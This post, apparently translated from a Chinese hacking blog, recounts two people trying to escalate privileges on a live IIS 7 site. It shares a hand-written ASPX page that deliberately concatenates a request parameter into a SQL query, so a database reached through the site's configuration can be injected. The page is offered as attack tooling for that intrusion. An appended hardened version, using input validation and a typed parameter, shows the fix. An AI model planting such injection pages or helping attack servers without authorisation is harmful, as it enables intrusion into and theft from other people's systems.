Yesterday 4z1 and I were looking at a site. Privilege escalation was very hard to pull off; we stared at it for a full 5 hours with no result. Server 2008 + IIS 7, no sa, no root, no services of any kind...
Along the way we used a hand-built ASPX injection page for the cross-site (cross-database) step. I found a pile of code online and not one piece of it worked.
It isn't much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" AutoEventWireup="true" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影aspx构造注射专用页面</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
    // Deliberately injectable test page: the request parameter is concatenated
    // straight into the SQL text. "连接名", "表" and "列名" are placeholders for the
    // connection-string name, table and column of the target configuration.
    void Page_Init(object sender, EventArgs e)
    {
        System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
        conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
        conn.Open();

        string i = this.Page.Request.Params["xxser"]; // the parameter goes here: ?xxser=1
        System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
        // ExecuteNonQuery returns -1 for a SELECT; the statement only needs to run.
        int x = command.ExecuteNonQuery();
        Response.Write(i + "\n");
        Response.Write(x);
        conn.Close();
    }
</script>
</div>
</form>
</body>
</html>
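For contrast, here is the same page with the hole closed. This is an added example, not the poster's code: the value of xxser is validated as an integer and bound as a typed SqlParameter, and the page only reports a row count. The connection-string name and the table/column identifiers are placeholders as in the original.

```csharp
<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Data" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<%@ Import Namespace="System.Configuration" %>
<script runat="server">
    // Hardened counterpart of the injectable page above (added example).
    // Table and column are fixed identifiers in the query text; only the value is user-supplied.
    void Page_Load(object sender, EventArgs e)
    {
        string raw = Request.Params["xxser"];
        int id;
        // Reject anything that is not an integer instead of concatenating it into SQL.
        if (!int.TryParse(raw, out id))
        {
            Response.StatusCode = 400;
            Response.Write("bad parameter");
            return;
        }

        // "连接名" is a placeholder for the connection-string name in web.config.
        string cs = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand(
            "SELECT COUNT(*) FROM [表] WHERE [列名] = @id", conn)) // placeholder identifiers
        {
            // The parameter reaches SQL Server as typed data, never as part of the query text.
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            int rows = (int)cmd.ExecuteScalar();
            // Echo only the parsed integer and the count, not raw input or database error text.
            Response.Write(id + "\n");
            Response.Write(rows);
        }
    }
</script>
```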